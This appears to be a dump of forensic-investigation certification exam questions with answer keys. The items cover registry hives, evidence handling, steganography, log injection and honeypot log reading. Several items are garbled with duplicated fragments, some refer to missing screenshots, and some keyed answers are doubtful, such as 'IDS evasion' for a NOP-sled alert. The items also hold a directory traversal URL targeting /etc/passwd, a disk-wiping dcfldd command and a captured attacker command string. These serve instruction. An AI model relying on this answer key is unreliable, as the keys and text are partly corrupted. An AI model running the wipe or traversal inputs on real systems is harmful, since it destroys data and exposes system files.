QUESTION 439 A computer forensics investigator is inspecting the firewall logs for a large financial institution that has employees working 24 hours a day, 7 days a week. What can the investigator infer from the screenshot seen below? A. A smurf attack has been attempted B. A denial of service has been attempted C. Network intrusion has occurred D. Buffer overflow attempt on the firewall.

Answer: C

QUESTION 474 Which of the following Steganography techniques allows you to encode information that ensures creation of cover for secret communication? A. Substitution techniques B. Transform domain techniques C. Cover generation techniques D. Spread spectrum techniques

Answer: C

QUESTION 475 Which root folder (hive) of registry editor contains a vast array of configuration information for the system, including hardware settings and software settings? A. HKEY_USERS B. HKEY_CURRENT_USER C. HKEY_LOCAL_MACHINE D. HKEY-CURRENT_CONFIG

Answer: C

QUESTION 477 WPA2 provides enterprise and Wi-Fi users with stronger data protection and network access control which of the following encryption algorithm is used DVWPA2? A. RC4-CCMP B. RC4-TKIP C. AES-CCMP D. AES-TKIP

Answer: C

QUESTION 484 The Electronic Serial Number (ESN) is a unique __________ recorded on a secure chip in a mobile phone by the manufacturer. A. 16-bit identifier B. 24-bit identifier C. 32-bit identifier D. 64-bit identifier

Answer: C

QUESTION 103 A system with a simple logging mechanism has not been given much attention during development, this system is now being targeted by attackers, if the attacker wants to perform a new line injection attack, what will he/she inject into the log file? A. Plaintext B. Single pipe character C. Multiple pipe characters D. HTML tags

Answer: A

QUESTION 104 When a file or folder is deleted, the complete path, including the original file name, is stored in a special hidden file called "INF02" in the Recycled folder. If the INF02 file is deleted, it is recreated when you___________. A. Restart Windows B. Kill the running processes in Windows task manager C. Run the antivirus tool on the system D. Run the anti-spyware tool on the system

Answer: A

QUESTION 105 Windows Security Accounts Manager (SAM) is a registry file which stores passwords in a hashed format. SAM file in Windows is located at: A. C:\windows\system32\config\SAM B. C:\windows\system32\con\SAM C. C:\windows\system32\Boot\SAM D. C:\windows\system32\drivers\SAM

Answer: A

QUESTION 109 Why is it Important to consider health and safety factors in the work carried out at all stages of the forensic process conducted by the forensic analysts? A. This is to protect the staff and preserve any fingerprints that may need to be recovered at a later date B. All forensic teams should wear protective latex gloves which makes them look professional and cool C. Local law enforcement agencies compel them to wear latest gloves D. It is a part of ANSI 346 forensics standard

Answer: A

QUESTION 11 What is a bit-stream copy? A. Bit-Stream Copy is a bit-by-bit copy of the original storage medium and exact copy of the original disk B. A bit-stream image is the file that contains the NTFS files and folders of all the data on a disk or partition C. A bit-stream image is the file that contains the FAT32 files and folders of all the data on a disk or partition D. Creating a bit-stream image transfers only non-deleted files from the original disk to the image disk

Answer: A

QUESTION 110 The Recycle Bin exists as a metaphor for throwing files away, but it also allows user to retrieve and restore files. Once the file is moved to the recycle bin, a record is added to the log file that exists in the Recycle Bin. Which of the following files contains records that correspond to each deleted file in the Recycle Bin? A. INFO2 file B. INFO1 file C. LOGINFO2 file D. LOGINFO1 file

Answer: A

QUESTION 192 How many times can data be written to a DVD+R disk? A. Twice B. Once C. Zero D. Infinite

Answer: B

QUESTION 112 Determine the message length from following hex viewer record: A. 6E2F B. 13 C. 27 D. 810D

Answer: D

QUESTION 9 Which of the following approaches checks and compares all the fields systematically and intentionally for positive and negative correlation with each other to determine the correlation across one or multiple fields? A. Graph-based approach B. Neural network-based approach C. Rule-based approach D. Automated field correlation approach

Answer: D

QUESTION 97 Data is striped at a byte level across multiple drives and parity information is distributed among all member drives. What RAID level is represented here? A. RAID Level0 B. RAID Level 1 C. RAID Level 3 D. RAID Level 5

Answer: D

QUESTION 334 The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity. A. Locard Exchange Principle B. Clark Standard C. Kelly Policy D. Silver-Platter Doctrine

Answer: D Explanation: Answer "Silver-Platter Doctrine" is probably the most correct. However, the Silver-Platter Doctrine allowed the Federal court to introduce illegally or improperly "State" seized evidence as long as Federal officers had no role in obtaining it. Also wanted to note that this Doctrine was declared unconstitional in 1960, Elkins vs United States

QUESTION 132 System software password cracking is defined as cracking the operating system and all other utilities that enable a computer to function A. True B. False

Answer: A

QUESTION 206 What must be obtained before an investigation is carried out at a location? A. Search warrant B. Subpoena C. Habeas corpus D. Modus operandi

Answer: A

QUESTION 133 Graphics Interchange Format (GIF) is a ___________RGB bitmap Image format for Images with up to 256 distinct colors per frame. A. 8-bit B. 16-bit C. 24-bit D. 32-bit

Answer: A

QUESTION 136 Router log files provide detailed Information about the network traffic on the Internet. It gives information about the attacks to and from the networks. The router stores log files in the____________. A. Router cache B. Application logs C. IDS logs D. Audit logs

Answer: A

QUESTION 207 The offset in a hexadecimal code is: A. The 0x at the beginning of the code B. The 0x at the end of the code C. The first byte after the colon D. The last byte after the colon

Answer: A

QUESTION 62 You should always work with original evidence A. True B. False

Answer: B

QUESTION 68 Damaged portions of a disk on which no read/Write operation can be performed is known as ______________. A. Lost sector B. Bad sector C. Empty sector D. Unused sector

Answer: B

QUESTION 14 What is the goal of forensic science? A. To determine the evidential value of the crime scene and related evidence B. Mitigate the effects of the information security breach C. Save the good will of the investigating organization D. It is a disciple to deal with the legal processes

Answer: A

QUESTION 142 A swap file is a space on a hard disk used as the virtual memory extension of a computer's RAM. Where is the hidden swap file in Windows located? A. C:\pagefile.sys B. C:\hiberfil.sys C. C:\config.sys D. C:\ALCSetup.log

Answer: A

QUESTION 137 Netstat is a tool for collecting Information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers? A. netstat -ano B. netstat -b C. netstat -r D. netstat -s

Answer: A

QUESTION 143 In an echo data hiding technique, the secret message is embedded into a __________as an echo. A. Cover audio signal B. Phase spectrum of a digital signal C. Pseudo-random signal D. Pseudo- spectrum signal

Answer: A

QUESTION 102 The status of the network interface cards (NICs) connected to a system gives information about whether the system is connected to a wireless access point and what IP address is being used. Which command displays the network configuration of the NICs on the system? A. ipconfig /all B. netstat C. net session D. tasklist

Answer: A

QUESTION 116 TCP/IP (Transmission Control Protocol/Internet Protocol) is a communication protocol used to connect different hosts in the Internet. It contains four layers, namely the network interface layer. Internet layer, transport layer, and application layer. Which of the following protocols works under the transport layer of TCP/IP? A. UDP B. HTTP C. FTP D. SNMP

Answer: A

QUESTION 118 You can interact with the Registry through intermediate programs. Graphical user interface (GUI) Registry editors such as Regedit.exe or Regedt32 exe are commonly used as intermediate programs in Windows 7. Which of the following is a root folder of the registry editor? A. HKEY_USERS B. HKEY_LOCAL_ADMIN C. HKEY_CLASSES_ADMIN D. HKEY_CLASSES_SYSTEM

Answer: A

QUESTION 121 Hard disk data addressing is a method of allotting addresses to each ___________of data on a hard disk A. Physical block B. Logical block C. Operating system block D. Hard disk block

Answer: A

QUESTION 123 Which of the following commands shows you the username and IP address used to access the system via a remote login session and the Type of client from which they are accessing the system? A. Net sessions B. Net file C. Net config D. Net share

Answer: A

QUESTION 128 Raw data acquisition format creates ____________of a data set or suspect drive. A. Simple sequential flat files B. Segmented files C. Compressed image files D. Segmented image files

Answer: A

QUESTION 129 A rogue/unauthorized access point is one that Is not authorized for operation by a particular firm or network A. True B. False

Answer: A

QUESTION 13 Tracks numbering on a hard disk begins at 0 from the outer edge and moves towards the center, typically reaching a value of ___________. A. 1023 B. 1020 C. 1024 D. 2023

Answer: A

QUESTION 130 Which of the following passwords are sent over the wire (and wireless) network, or stored on some media as it is typed without any alteration? A. Clear text passwords B. Obfuscated passwords C. Hashed passwords D. Hex passwords

Answer: A

QUESTION 131 Wireless network discovery tools use two different methodologies to detect, monitor and log a WLAN device (i.e. active scanning and passive scanning). Active scanning methodology involves ____________and waiting for responses from available wireless networks. A. Broadcasting a probe request frame B. Sniffing the packets from the airwave C. Scanning the network D. Inspecting WLAN and surrounding networks

Answer: A

QUESTION 146 What is static executable file analysis? A. It is a process that consists of collecting information about and from an executable file without actually launching the file under any circumstances B. It is a process that consists of collecting information about and from an executable file by launching the file under any circumstances C. It is a process that consists of collecting information about and from an executable file without actually launching an executable file in a controlled and monitored environment D. It is a process that consists of collecting information about and from an executable file by launching an executable file in a controlled and monitored environment

Answer: A

QUESTION 147 Networks are vulnerable to an attack which occurs due to overextension of bandwidth, bottlenecks, network data interception, etc. Which of the following network attacks refers to a process in which an attacker changes his or her IP address so that he or she appears to be someone else? A. IP address spoofing B. Man-in-the-middle attack C. Denial of Service attack D. Session sniffing

Answer: A

QUESTION 148 Which of the following email headers specifies an address for mailer-generated errors, like "no such user" bounce messages, to go to (instead of the sender's address)? A. Errors-To header B. Content-Transfer-Encoding header C. Mime-Version header D. Content-Type header

Answer: A

QUESTION 149 Email spoofing refers to: A. The forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source B. The criminal act of sending an illegitimate email, falsely claiming to be from a legitimate site in an attempt to acquire the user's personal or account information C. Sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address Is hosted to cause a denial-of-service attack D. A sudden spike of "Reply All" messages on an email distribution list, caused by one misdirected message

Answer: A

QUESTION 15 Attackers can manipulate variables that reference files with "dot-dot-slash (./)" sequences and their variations such as http://www.juggyDoy.corn/GET/process.php./././././././././etc/passwd. Identify the attack referred. A. Directory traversal B. SQL Injection C. XSS attack D. File injection

Answer: A

QUESTION 157 Dumpster Diving refers to: A. Searching for sensitive information in the user's trash bins and printer trash bins, and searching the user's desk for sticky notes B. Looking at either the user's keyboard or screen while he/she is logging in C. Convincing people to reveal the confidential information D. Creating a set of dictionary words and names, and trying all the possible combinations to crack the password

Answer: A

QUESTION 162 According to US federal rules, to present a testimony in a court of law, an expert witness needs to furnish certain information to prove his eligibility. Jason, a qualified computer forensic expert who has started practicing two years back, was denied an expert testimony in a computer crime case by the US Court of Appeals for the Fourth Circuit in Richmond, Virginia. Considering the US federal rules, what could be the most appropriate reason for the court to reject Jason's eligibility as an expert witness? A. Jason was unable to furnish documents showing four years of previous experience in the field B. Being a computer forensic expert, Jason is not eligible to present testimony in a computer crime case C. Jason was unable to furnish documents to prove that he is a computer forensic expert D. Jason was not aware of legal issues involved with computer crimes

Answer: A

QUESTION 165 Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish? dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror, sync A. Fill the disk with zeros B. Low-level format C. Fill the disk with 4096 zeros D. Copy files from the master disk to the slave disk on the secondary IDE controller

Answer: A

QUESTION 166 When examining a file with a Hex Editor, what space does the file header occupy? A. The first several bytes of the file B. One byte at the beginning of the file C. None, file headers are contained in the FAT D. The last several bytes of the file

Answer: A

QUESTION 18 Which of the following log injection attacks uses white space padding to create unusual log entries? A. Word wrap abuse attack B. HTML injection attack C. Terminal injection attack D. Timestamp injection attack

Answer: A

QUESTION 187 When searching through file headers for picture file formats, what should be searched to find a JPEG file in hexadecimal format? A. FF D8 FF E0 00 10 B. FF FF FF FF FF FF C. FF 00 FF 00 FF 00 D. EF 00 EF 00 EF 00

Answer: A

QUESTION 190 Where is the default location for Apache access logs on a Linux computer? A. usr/local/apache/logs/access_log B. bin/local/home/apache/logs/access_log C. usr/logs/access_log D. logs/usr/apache/access_log

Answer: A

QUESTION 2 Data compression involves encoding the data to take up less storage space and less bandwidth for transmission. It helps in saving cost and high data manipulation in many business applications. Which data compression technique maintains data integrity? A. Lossless compression B. Lossy compression C. Speech encoding compression D. Lossy video compression

Answer: A

QUESTION 20 Recovery of the deleted partition is the process by which the investigator evaluates and extracts the deleted partitions. A. True B. False

Answer: A

QUESTION 203 Heather, a computer forensics investigator, is assisting a group of investigators working on a large computer fraud case involving over 20 people. These 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather responsibility is to findThese 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather? responsibility is to find out how the accused people communicated between each other. She has searched their email and their computers and has not found any useful evidence. Heather then finds some possibly useful evidence under the desk of one of the accused. In an envelope she finds a piece of plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic with holes at many of the other accused peoples?desks. Heather believes that the 20 people involved in the case were using a cipher to send secret messages in between each other. What type of cipher was used by the accused in this case? A. Grill cipher B. Null cipher C. Text semagram D. Visual semagram

Answer: A

QUESTION 211 Why should you never power on a computer that you need to acquire digital evidence from? A. When the computer boots up, files are written to the computer rendering the data nclean?When the computer boots up, files are written to the computer rendering the data ?nclean B. When the computer boots up, the system cache is cleared which could destroy evidence C. When the computer boots up, data in the memory buffer is cleared which could destroy evidenceWhen the computer boots up, data in the memory? buffer is cleared which could destroy evidence D. Powering on a computer has no affect when needing to acquire digital evidence from it

Answer: A

QUESTION 212 What type of attack sends SYN requests to a target system with spoofed IP addresses? A. SYN flood B. Ping of death C. Cross site scripting D. Land

Answer: A

QUESTION 213 What must an investigator do before disconnecting an iPod from any type of computer? A. Unmount the iPod B. Mount the iPod C. Disjoin the iPod D. Join the iPod

Answer: A

QUESTION 219 Given the drive dimensions as follows and assuming a sector has 512 bytes, what is the capacity of the described hard drive? 22,164 cylinders/disk 80 heads/cylinder 63 sectors/track A. 53.26 GB B. 57.19 GB C. 11.17 GB D. 10 GB

Answer: A

QUESTION 22 What is a SCSI (Small Computer System Interface)? A. A set of ANSI standard electronic interfaces that allow personal computers to communicate with peripheral hardware such as disk drives, tape drives. CD-ROM drives, printers, and scanners B. A standard electronic interface used between a computer motherboard's data paths or bus and the computer's disk storage devices C. A "plug-and-play" interface, which allows a device to be added without an adapter card and without rebooting the computer D. A point-to-point serial bi-directional interface for transmitting data between computer devices at data rates of up to 4 Gbps

Answer: A

QUESTION 223 Daryl, a computer forensics investigator, has just arrived at the house of an alleged computer hacker. Daryl takes pictures and tags all computer and peripheral equipment found in the house. Daryl packs all the items found in his van and takes them back to his lab for further examination. At his lab, Michael his assistant helps him with the investigation. Since Michael is still in training, Daryl supervises all of his work very carefully. Michael is not quite sure about the procedures to copy all the data off the computer and peripheral devices. How many data acquisition tools should Michael use when creating copies of the evidence for the investigation? A. Two B. One C. Three D. Four

Answer: A

QUESTION 224 What will the following command accomplish? dd if=/dev/xxx of=mbr.backup bs=512 count=1 A. Back up the master boot record B. Restore the master boot record C. Mount the master boot record on the first partition of the hard drive D. Restore the first 512 bytes of the first partition of the hard drive

Answer: A

QUESTION 226 During an investigation, an employee was found to have deleted harassing emails that were sent to someone else. The company was using Microsoft Exchange and had message tracking enabled. Where could the investigator search to find the message tracking log file on the Exchange server? A. C:\Program Files\Exchsrvr\servername.log B. D:\Exchsrvr\Message Tracking\servername.log C. C:\Exchsrvr\Message Tracking\servername.log D. C:\Program Files\Microsoft Exchange\srvr\servername.log

Answer: A

QUESTION 23 An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome. A. True B. False

Answer: A

QUESTION 230 Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime? A. Search warrant B. Subpoena C. Wire tap D. Bench warrant

Answer: A

QUESTION 232 An on-site incident response team is called to investigate an alleged case of computer tampering within their company. Before proceeding with the investigation, the CEO informs them that the incident will be classified as low level. How long will the team have to respond to the incident? A. One working day B. Two working days C. Immediately D. Four hours

Answer: A

QUESTION 238 If a PDA is seized in an investigation while the device is turned on, what would be the proper procedure? A. Keep the device powered on B. Turn off the device immediately C. Remove the battery immediately D. Remove any memory cards immediately

Answer: A

QUESTION 24 Network forensics can be defined as the sniffing, recording, acquisition and analysis of the network traffic and event logs in order to investigate a network security incident. A. True B. False

Answer: A

QUESTION 240 If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement? A. True B. False

Answer: A

QUESTION 242 Cylie is investigating a network breach at a state organization in Florida. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company's PBX system be called? A. Phreaking B. Squatting C. Crunching D. Pretexting

Answer: A

QUESTION 244 You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them? A. allinurl:"exchange/logon.asp" B. intitle:"exchange server" C. outlook:"search" D. locate:"logon page"

Answer: A

QUESTION 246 You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large pharmaceutical manufacturer. While at the corporate office of the company, the CEO demands to know the status of the investigation. What prevents you from discussing the case with the CEO? A. The attorney-work-product rule B. Good manners C. Trade secrets D. ISO 17799

Answer: A

QUESTION 260 On an Active Directory network using NTLM authentication, where on the domain controllers are the passwords stored? A. SAM B. AMS C. Shadow file D. Password.conf

Answer: A

QUESTION 277 A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Choose the most feasible option. A. Image the disk and try to recover deleted files B. Seek the help of co-workers who are eye-witnesses C. Check the Windows registry for connection data (You may or may not recover) D. Approach the websites for evidence

Answer: A

QUESTION 280 When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the: A. Recycle Bin B. MSDOS.sys C. BIOS D. Case files

Answer: A

QUESTION 29 In Windows 7 system files, which file reads the Boot.ini file and loads Ntoskrnl.exe. Bootvid.dll. Hal.dll, and boot-start device drivers? A. Ntldr B. Gdi32.dll C. Kernel32.dll D. Boot.in

Answer: A

QUESTION 295 You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might ;QUESTION whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab? A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab B. make an MD5 hash of the evidence and compare it to the standard database developed by NIST C. there is no reason to worry about this possible claim because state labs are certified D. sign a statement attesting that the evidence is the same as it was when it entered the lab

Answer: A

QUESTION 296 In Microsoft file structures, sectors are grouped together to form: A. Clusters B. Drives C. Bitstreams D. Partitions

Answer: A

QUESTION 299 Windows identifies which application to open a file with by examining which of the following? A. The File extension B. The file attributes C. The file Signature at the end of the file D. The file signature at the beginning of the file

Answer: A

QUESTION 30 What is the "Best Evidence Rule"? A. It states that the court only allows the original evidence of a document, photograph, or recording at the trial rather than a copy B. It contains system time, logged-on user(s), open files, network information, process information, process-to-port mapping, process memory, clipboard contents, service/driver information, and command history C. It contains hidden files, slack space, swap file, index.dat files, unallocated clusters, unused partitions, hidden partitions, registry settings, and event logs D. It contains information such as open network connection, user logout, programs that reside in memory, and cache data

Answer: A

QUESTION 307 How many bits is Source Port Number in TCP Header packet? A. 16 B. 48 C. 32 D. 64

Answer: A

QUESTION 31 What is the First Step required in preparing a computer for forensics investigation? A. Do not turn the computer off or on, run any programs, or attempt to access data on a computer B. Secure any relevant media C. Suspend automated document destruction and recycling policies that may pertain to any relevant media or users at Issue D. Identify the type of data you are seeking, the Information you are looking for, and the urgency level of the examination

Answer: A

QUESTION 310 What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network? A. Fraggle B. Smurf scan C. SYN flood D. Teardrop

Answer: A

QUESTION 311 You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here? A. Enumerate domain user accounts and built-in groups B. Enumerate MX and A records from DNS C. Establish a remote connection to the Domain Controller D. Poison the DNS records with false records

Answer: A

QUESTION 318 The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this ;QUESTION is to test whether the student can read basic information from log entries and interpret the nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 A. An IDS evasion technique B. A buffer overflow attempt C. A DNS zone transfer D. Data being retrieved from 63.226.81.13

Answer: A

QUESTION 32 What is the smallest allocation unit of a hard disk? A. Cluster B. Spinning tracks C. Disk platters D. Slack space

Answer: A

QUESTION 324 One way to identify the presence of hidden partitions on a suspect's hard drive is to: A. Add up the total size of all known partitions and compare it to the total size of the hard drive B. Examine the FAT and identify hidden partitions by noting an H in the partition Type field C. Examine the LILO and note an H in the partition Type field D. It is not possible to have hidden partitions on a hard drive

Answer: A

QUESTION 330 Study the log given below and Answer the following ;QUESTION: Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate? A. Disallow UDP 53 in from outside to DNS server B. Allow UDP 53 in from DNS server to outside C. Disallow TCP 53 in from secondaries or ISP server to DNS server D. Block all UDP traffic

Answer: A

QUESTION 332 Law enforcement officers are conducting a legal search for which a valid warrant was obtained. While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible? A. Plain view doctrine B. Corpus delicti C. Locard Exchange Principle D. Ex Parte Order

Answer: A

QUESTION 339 You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a implePC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a ?imple backup copy?of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a imple backup copy?will not provide deleted files or recover file fragments. What type of copy do you need to make toYou inform him that a ?imple backup copy?will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings? A. Bit-stream copy B. Robust copy C. Full backup copy D. Incremental backup copy

Answer: A

QUESTION 340 After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that? A. RestrictAnonymous must be set to "2" for complete security B. There is no way to always prevent an anonymous null session from establishing C. RestrictAnonymous must be set to "10" for complete security D. RestrictAnonymous must be set to "3" for complete security

Answer: A

QUESTION 35 Physical security recommendations: There should be only one entrance to a forensics lab A. True B. False

Answer: A

QUESTION 352 You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive. org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found? A. Web bug B. CGI code C. Trojan.downloader D. Blind bug

Answer: A

QUESTION 356 What does ICMP Type 3/Code 13 mean? A. Administratively Blocked B. Host Unreachable C. Protocol Unreachable D. Port Unreachable

Answer: A

QUESTION 379 You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall Quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened? A. The firewall failed-open B. The firewall failed-closed C. The firewall ACL has been purged D. The firewall failed-bypass

Answer: A

QUESTION 387 Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform? A. ICMP ping sweep B. Ping trace C. Tracert D. Smurf scan

Answer: A

QUESTION 39 Digital photography helps in correcting the perspective of the Image which Is used In taking the measurements of the evidence. Snapshots of the evidence and incident-prone areas need to be taken to help in the forensic process. Is digital photography accepted as evidence in the court of law? A. Yes B. No

Answer: A

QUESTION 390 When obtaining a warrant it is important to: A. particularly describe the place to be searched and particularly describe the items to be seized B. generally describe the place to be searched and particularly describe the items to be seized C. generally describe the place to be searched and generally describe the items to be seized D. particularly describe the place to be searched and generally describe the items to be seized

Answer: A

QUESTION 395 John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that? A. Firewalk sets all packets with a TTL of one B. Firewalk sets all packets with a TTL of zero C. Firewalk cannot pass through Cisco firewalls D. Firewalk cannot be detected by network sniffers

Answer: A

QUESTION 403 Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test. The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis? A. False negatives B. True negatives C. True positives D. False positives

Answer: A

QUESTION 41 Shortcuts are the files with the extension .Ink that are created and are accessed by the users. These files provide you with information about: A. Files or network shares B. Running application C. Application logs D. System logs

Answer: A

QUESTION 412 A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= += 03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84 Len: 64 01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................ 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= += 03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104 Len: 1084 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhost =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+ 03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a; 69 64 3B id; 